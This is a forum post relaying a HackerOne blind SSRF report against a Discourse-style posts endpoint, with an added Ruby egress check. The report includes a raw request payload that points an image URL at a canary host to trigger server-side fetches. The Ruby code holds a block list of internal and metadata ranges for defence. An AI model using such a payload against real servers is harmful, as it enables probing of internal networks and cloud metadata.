We received a HackerOne report about the issue below.
What I’m wondering is:
- Is this a problem
- Are there any suggestions / something I can do about it
Summary:
Hi, I have found a blind SSRF on the
hxxps://xyz.com/posts
endpoint.
Steps To Reproduce:
- Login to your account on xyz.com
- Go to private messages (there will be a greeting message from their discobot)
- While sending a message, upload an image and intercept the request in Burp
- In the payload, change the image upload URL to your canary URL
- The payload will look like this:
raw=![svg_image|690x388]>(hxxp://canarytokens.com/tags/images/terms/ctw75qckq1htf6n3rt9asrpn3/submit.aspx) &unlist_topic=false&category=&topic_id=1659497&is_warning=false&whisper=false&archetype=regular&composer_open_duration_msecs=12597&featured_link=&shared_draft=false&draft_key=topic_1659497&reply_to_post_number=83&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][width]=5120&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][height]=2880&nested_post=true
- When you send the request, two canary alerts will be triggered; or check the server logs, where there will be one request made with a Ruby user-agent and one from their Amazon compute instance
Impact
The vulnerability allows an attacker to make arbitrary HTTP/HTTPS requests inside an xyz.com instance's network.
From this thread, it seems like this is due to onebox behavior: "Server-side request forgery vulnerability".
I also saw this HackerOne report from years ago: "SSRF in upload IMG through URL".
Thanks!
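The following is an added example, not the reporter's, Discourse's or xyz.com's code, and it is not presented as the fix for this particular report. It shows the kind of egress check a server-side image or onebox fetcher can apply before it requests a URL that came from user input: refuse non-HTTP schemes, resolve the host, and reject the request if any resulting address falls in a loopback, link-local (including the cloud metadata range 169.254.0.0/16) or private range. The hostnames, addresses and the lookup table standing in for DNS are all constructed for the example; the resolver is injectable so the check runs offline.

```ruby
require "ipaddr"
require "uri"
require "resolv"

# Address ranges a server-side fetcher should never connect to.
# Constructed list for this example; extend it for your own network.
BLOCKED_RANGES = %w[
  0.0.0.0/8 10.0.0.0/8 100.64.0.0/10 127.0.0.0/8 169.254.0.0/16
  172.16.0.0/12 192.168.0.0/16 ::1/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }

# True if +ip+ (string or IPAddr) is in a blocked range. Unparseable input
# is treated as blocked so the check fails closed.
def blocked_ip?(ip)
  addr = IPAddr.new(ip.to_s)
  # An IPv4-mapped IPv6 address (::ffff:10.0.0.1) is unwrapped so the
  # IPv4 rules apply to it instead of being bypassed.
  addr = addr.native if addr.ipv4_mapped?
  BLOCKED_RANGES.any? { |range| range.include?(addr) }
rescue IPAddr::InvalidAddressError
  true
end

# True if +host+ is an IP literal rather than a name that needs resolving.
def ip_literal?(host)
  IPAddr.new(host)
  true
rescue IPAddr::InvalidAddressError
  false
end

# Decide whether a fetcher may request +url+. +resolver+ maps a hostname
# to the list of addresses it resolves to; the default uses real DNS, and
# a constructed table can be injected for offline tests.
def safe_fetch_target?(url, resolver: ->(host) { Resolv.getaddresses(host) })
  uri = URI.parse(url)
  return false unless %w[http https].include?(uri.scheme)
  host = uri.hostname # strips the [] around IPv6 literals
  return false if host.nil? || host.empty?

  addrs = ip_literal?(host) ? [host] : resolver.call(host)
  return false if addrs.empty?
  # Every address must be acceptable: a name that resolves to one public
  # and one internal address is rejected outright.
  addrs.none? { |a| blocked_ip?(a) }
rescue URI::InvalidURIError
  false
end
```

Two caveats when using a check like this in practice: apply it to the address the socket actually connects to rather than to a separate lookup done earlier, since a hostname can change its answer between the check and the fetch (DNS rebinding), and re-run it on every redirect target, because a public host can 30x the fetcher to an internal address.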